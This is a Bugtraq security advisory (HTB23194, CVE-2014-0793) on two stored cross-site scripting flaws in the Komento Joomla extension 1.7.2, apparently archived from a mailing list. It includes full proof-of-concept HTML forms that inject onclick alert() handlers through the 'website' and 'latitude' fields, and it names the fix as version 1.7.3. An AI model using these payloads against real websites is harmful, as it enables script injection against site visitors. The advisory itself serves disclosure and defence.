'Cross-Site Scripting (XSS) in Komento Joomla Extension'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Cross-Site Scripting (XSS) in Komento Joomla Extension
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2014-01-23 12:13:35
Message-ID: 20140123121335.79E502C5864E () htbridge ! ch
[Download RAW message or body]

Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014 
Vendor Patch: January 2, 2014 
Public Disclosure: January 23, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento \
Joomla Extension, which can be exploited to perform script insertion attacks.


1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data \
passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote \
attacker can submit a comment with specially crafted "Website" field and execute \
arbitrary HTML and script code in browser in context of the vulnerable website when a \
user clicks on the nickname of the malicious author.

The following exploitation example uses the "alert()" JavaScript function to display \
word "immuniweb" when user clicks on the attacker's nickname in comment:

<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl"    value="component">
<input type="hidden" name="format"  value="ajax"> <input type="hidden" name="no_html" \
value="1"> <input type="hidden" name="component"  value="com_content"> <input \
type="hidden" name="cid"  value="24"> <input type="hidden" name="comment"  \
value="comment"> <input type="hidden" name="parent_id"  value="0"> <input \
type="hidden" name="name"  value="name"> <input type="hidden" name="email"  \
value="email@email.com"> <input type="hidden" name="website"  \
value='http://www.htbridge.com"  onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe"  value="false"> <input type="hidden" \
name="latitude"  value=''> <input type="hidden" name="longitude"  value="1"> <input \
type="hidden" name="address"  value="1"> <input type="hidden" name="contentLink" \
value="http://joomla/"> <input type="hidden" name="pageItemId"  value="435"> <input \
type="hidden" name="option"  value="com_komento"> <input type="hidden" \
name="namespace" value="site.views.komento.addcomment"> <input type="hidden" \
name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> \
</form>


1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data \
passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote \
attacker can submit a comment with specially crafted "latitude" field and execute \
arbitrary HTML and script code in browser in context of the vulnerable website when a \
user clicks on the address of the malicious author.

The following exploitation example uses the "alert()" JavaScript function to display \
word "immuniweb" when user clicks on the attacker's address in comment:

<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl"    value="component">
<input type="hidden" name="format"  value="ajax"> <input type="hidden" name="no_html" \
value="1"> <input type="hidden" name="component"  value="com_content"> <input \
type="hidden" name="cid"  value="24"> <input type="hidden" name="comment"  \
value="comment"> <input type="hidden" name="parent_id"  value="0"> <input \
type="hidden" name="name"  value="name"> <input type="hidden" name="email"  \
value="email@email.com"> <input type="hidden" name="website"  \
value='www.htbridge.com'> <input type="hidden" name="subscribe"  value="false"> \
<input type="hidden" name="latitude"  value='"  \
onclick="javascript:alert(/imuniweb/);">'> <input type="hidden" name="longitude"  \
value="1"> <input type="hidden" name="address"  value="1"> <input type="hidden" \
name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId"  \
value="435"> <input type="hidden" name="option"  value="com_komento"> <input \
type="hidden" name="namespace" value="site.views.komento.addcomment"> <input \
type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" \
id="btn"> </form>


-----------------------------------------------------------------------------------------------


Solution:

Update to Komento 1.7.3

More Informaion:
http://stackideas.com/downloads/changelog/komento

-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - \
Cross-Site Scripting (XSS) in Komento Joomla Extension. [2] Komento Joomla Extension \
- http://stackideas.com/ - Komento is a Joomla comment extension for articles and \
blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop. [3] Common \
Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope \
and free for public use, CVE Ž is a dictionary of publicly known information security \
vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - \
http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a \
formal list of software weakness types. [5] ImmuniWeb Ž - \
http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web \
application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic